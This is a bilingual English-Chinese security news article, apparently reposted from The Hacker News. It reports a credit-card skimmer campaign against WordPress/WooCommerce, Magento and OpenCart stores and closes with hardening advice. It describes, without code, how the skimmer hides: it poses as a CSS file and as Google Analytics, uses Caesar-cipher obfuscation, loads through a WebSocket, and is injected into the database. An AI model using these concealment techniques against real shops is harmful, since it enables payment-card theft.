WordPress、Magento和OpenCart遭遇新信用卡窃取器

Multiple content management system (CMS) platforms like WordPress, Magento, and OpenCart have been targeted by a new credit card web skimmer called Caesar Cipher Skimmer.

多个内容管理系统（CMS）平台，如WordPress，Magento和OpenCart，已成为一个名为凯撒密码窃取者的新信用卡网络窥视器的目标。

A web skimmer refers to malware that is injected into e-commerce sites with the goal of stealing financial and payment information.

网络窥视者是指注入到电子商务网站中的恶意软件，其目标是窃取金融和支付信息。

According to Sucuri, the latest campaign entails making malicious modifications to the checkout PHP file associated with the WooCommerce plugin for WordPress ("form-checkout.php") to steal credit card details.

根据Sucuri的说法，最新的攻击活动涉及对与WordPress的WooCommerce插件相关的结帐PHP文件（"form-checkout.php"）进行恶意修改，以窃取信用卡详细信息。

"For the past few months, the injections have been changed to look less suspicious than a long obfuscated script," security researcher Ben Martin said, noting the malware's attempt to masquerade as Google Analytics and Google Tag Manager.

“在过去的几个月里，这些注入已经被更改，看起来比一个长时间的混淆脚本更不可疑。”安全研究员本·马丁说，指出恶意软件试图伪装成Google Analytics和Google Tag Manager。

Specifically, it utilizes the same substitution mechanism employed in Caesar cipher to encode the malicious piece of code into a garbled string and conceal the external domain that's used to host the payload.

具体而言，它利用凯撒密码中使用的相同替换机制来将恶意代码编码为一串混乱的字符串，并隐藏用于托管有效负载的外部域。

It's presumed that all the websites have been previously compromised through other means to stage a PHP script that goes by the names "style.css" and "css.php" in an apparent effort to mimic an HTML style sheet and evade detection.

据推测，所有这些网站都曾因其他手段而受到过先前的威胁，以制作一个名为“style.css”和“css.php”的PHP脚本，显然是为了模仿HTML样式表并避免检测。

These scripts, in turn, are designed to load another obfuscated JavaScript code that creates a WebSocket and connects to another server to fetch the actual skimmer.

这些脚本又被设计为加载另一段混淆的JavaScript代码，创建一个WebSocket并连接到另一个服务器以获取实际的窥视器。

"The script sends the URL of the current web pages, which allows the attackers to send customized responses for each infected site," Martin pointed out. "Some versions of the second layer script even check if it is loaded by a logged-in WordPress user and modify the response for them."

“脚本发送当前网页的URL，这使得攻击者能够为每个受感染的站点发送定制响应。”马丁指出。“第二层脚本的某些版本甚至会检查它是否被登录的WordPress用户加载，并为他们修改响应。”

Some versions of the script have programmer-readable explanations (aka comments) written in Russian, suggesting that the threat actors behind the operation are Russian-speaking.

该脚本的一些版本中有用俄语编写的程序员可读的说明（即注释），这表明这个操作背后的威胁行为者是说俄语的。

The form-checkout.php file in WooCommerce is not the only method used to deploy the skimmer, for the attackers have also been spotted misusing the legitimate WPCode plugin to inject it into the website database.

WooCommerce中的form-checkout.php文件并不是部署Skimmer的唯一方法，因为攻击者还被发现滥用合法的WPCode插件将其注入网站数据库。

On websites that use Magento, the JavaScript injections are performed on database tables such as core_config_data. It's currently not known how this is accomplished on OpenCart sites.

在使用Magento的网站上，JavaScript注入是在数据库表（如core_config_data）上执行的。目前尚不清楚如何在OpenCart网站上实现此目的。

Due to its prevalent use as a foundation for websites, WordPress and the larger plugin ecosystem have become a lucrative target for malicious actors, allowing them easy access to a vast attack surface.

由于WordPress及其更大的插件生态系统被广泛用作网站的基础，因此已成为恶意行为者的一个有利目标，为他们提供易于访问的广泛攻击面。

It's imperative that site owners keep their CMS software and plugins up-to-date, enforce password hygiene, and periodically audit them for the presence of suspicious administrator accounts.

站点所有者有必要保持其CMS软件和插件的最新状态，强化密码卫生，定期审计以检查是否存在可疑的管理员帐户。

参考资料

[1]https://thehackernews.com/2024/06/new-credit-card-skimmer-targets.html

关注我们

        欢迎来到我们的公众号！我们专注于全球网络安全和精选双语资讯，为您带来最新的资讯和深入的分析。在这里，您可以了解世界各地的网络安全事件，同时通过我们的双语新闻，获取更多的行业知识。感谢您选择关注我们，我们将继续努力，为您带来有价值的内容。

原文始发于微信公众号（知机安全）：WordPress、Magento和OpenCart遭遇新信用卡窃取器